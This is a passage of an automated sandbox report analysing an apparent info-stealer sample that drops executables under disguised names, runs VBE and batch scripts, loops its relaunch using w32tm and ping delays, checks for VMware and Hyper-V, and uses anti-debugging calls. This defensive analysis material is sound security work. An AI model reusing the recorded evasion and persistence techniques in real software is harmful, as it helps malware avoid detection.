                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000020.00000002.2088916085.000000001BC3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}
                                    Source: w32tm.exe, 00000038.00000002.2446018019.000001CA018C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2484543389.000000001B460000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1952324247.000000001B6AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Yw;}
                                    Source: 7vP2IvNXqx.exe, fXvSafnhbinoSxnWSYFNsCJETLnb.exe3.4.dr, fXvSafnhbinoSxnWSYFNsCJETLnb.exe0.4.dr, fXvSafnhbinoSxnWSYFNsCJETLnb.exe.4.dr, fXvSafnhbinoSxnWSYFNsCJETLnb.exe2.4.dr, fXvSafnhbinoSxnWSYFNsCJETLnb.exe1.4.dr, winIntorefruntimebroker.exe.0.drBinary or memory string: HGfS1OICL5
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2202365450.000000001B221000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x
                                    Source: w32tm.exe, 00000008.00000002.1744031152.000001501C58C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2202365450.000000001B292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                                    Source: w32tm.exe, 0000001F.00000002.2058987582.00000193A0227000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2202365450.000000001B229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}iJ:
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2484543389.000000001B511000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                                    Source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000009.00000002.1758738890.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000000F.00000002.1883052954.000000001B550000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000013.00000002.1927332382.0000027D39628000.00000004.00000020.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1942135265.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000001A.00000002.1993561726.00000260655F0000.00000004.00000020.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000001B.00000002.2020272407.000000001C1A0000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000029.00000002.2238626867.0000023A704C0000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002E.00000002.2304902815.0000014A90A60000.00000004.00000020.00020000.00000000.sdmp, fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000002F.00000002.2319292050.0000000001118000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000033.00000002.2372257253.000001DD99897000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeAPI call chain: ExitProcess graph end nodegraph_0-23663
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002EF838
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002F7DEE mov eax, dword ptr fs:[00000030h]0_2_002F7DEE
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002FC030 GetProcessHeap,0_2_002FC030
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002EF838
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EF9D5 SetUnhandledExceptionFilter,0_2_002EF9D5
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002EFBCA
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002F8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002F8EBD
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\yu2eKcIww0WQz1diSHkj97Iay5LLlL45l6P5L9G4ltB7.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll/winIntorefruntimebroker.exe"Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5K6fCoMBVq.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" Jump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ECvQfnJznV.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" Jump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ddp3dI2Wa5.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qlEmwzstBs.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DoC45cXmCX.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GxEp7zFCwB.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UCvjmtCiY3.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bviytIjYVg.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ujuZrulyBl.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nXpNUGu1Ke.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0WKriXx1WO.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EF654 cpuid 0_2_002EF654
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_002EAF0F
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeQueries volume information: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeQueries volume information: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_002EDF1E
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002DB146 GetVersionExW,0_2_002DB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    Source: Yara matchFile source: 00000009.00000002.1759792480.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000F.00000002.1875842793.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000009.00000002.1759792480.000000000287D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000F.00000002.1875842793.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000002.1691880334.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: winIntorefruntimebroker.exe PID: 7460, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: fXvSafnhbinoSxnWSYFNsCJETLnb.exe PID: 7652, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: fXvSafnhbinoSxnWSYFNsCJETLnb.exe PID: 7952, type: MEMORYSTR
                                    Source: Yara matchFile source: 7vP2IvNXqx.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.792c722.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.7015722.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.winIntorefruntimebroker.exe.ff0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1650087687.00000000078DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1675544787.0000000000FF2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1650555620.00000000078DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1649700859.0000000006FC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, type: DROPPED
                                    Source: Yara matchFile source: 7vP2IvNXqx.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.792c722.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7vP2IvNXqx.exe.7015722.0.unpack, type: UNPACKEDPE
